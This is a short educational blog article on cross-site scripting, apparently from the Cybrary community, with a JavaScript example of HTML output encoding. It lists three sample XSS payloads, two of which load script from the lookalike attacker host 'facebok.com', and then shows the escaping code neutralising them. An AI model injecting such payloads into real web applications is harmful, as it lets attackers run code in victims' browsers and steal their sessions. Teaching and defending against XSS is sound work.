Hi there Cybrarians!

As always, I should thank all of you for your support. I'm really happy that my articles are helpful to most of you, and now I'm back with another article. Let's also greet the moderators, who are doing a great job with our content on Cybrary.

I was recently asked to explain how XSS attacks work in depth, and that's why I want to show you what XSS is, how an attacker might use it, and how a developer can protect an application from this kind of attack.

This article is only for educational purposes and I won't be responsible for any misuse. I won't answer anything that is not in the frame "Ethical and Ethical only".

1. What is an XSS Attack?
In this scenario, we always need 3 objects: a hosted Website, an Attacker, and the Victim.
<script src=https://facebok.com/xss.js></script>
<script> alert("Boo!"); </script>
<object type="text/x-scriptlet" data="http://facebok.com/xss.html">
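
On the developer side, the sample inputs above stop being markup once they are encoded at the point of output. The following is an added example, not code from the original article; the function names (`escapeHtml`, `renderCommentUnsafe`, `renderCommentSafe`, `stillActive`) and the comment template are assumptions made for illustration.

```javascript
// Added example (not from the article): output encoding applied to the
// article's sample inputs. All function names here are hypothetical.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

// Encode untrusted text for HTML element content or a quoted attribute value.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: user input is concatenated into the page unchanged.
function renderCommentUnsafe(author, body) {
  return `<div class="comment" title="${author}">${body}</div>`;
}

// Hardened pattern: every untrusted value is encoded where it is written out.
function renderCommentSafe(author, body) {
  return `<div class="comment" title="${escapeHtml(author)}">${escapeHtml(body)}</div>`;
}

// The three sample inputs shown in the article, used as test data.
const SAMPLE_INPUTS = [
  "<script src=https://facebok.com/xss.js></script>",
  '<script> alert("Boo!"); </script>',
  '<object type="text/x-scriptlet" data="http://facebok.com/xss.html">',
];

// Return the sample inputs that still produce a live <script>/<object> tag
// after passing through the given render function.
function stillActive(renderFn) {
  return SAMPLE_INPUTS.filter((input) =>
    /<\s*(script|object)\b/i.test(renderFn("guest", input))
  );
}

console.log("unsafe render, live tags:", stillActive(renderCommentUnsafe).length);
console.log("safe render, live tags:  ", stillActive(renderCommentSafe).length);
console.log(renderCommentSafe('Ann "A" Lee', SAMPLE_INPUTS[1]));
```

This encoder covers HTML element content and quoted attribute values only; values written into script blocks, URLs or CSS need encoding for those contexts.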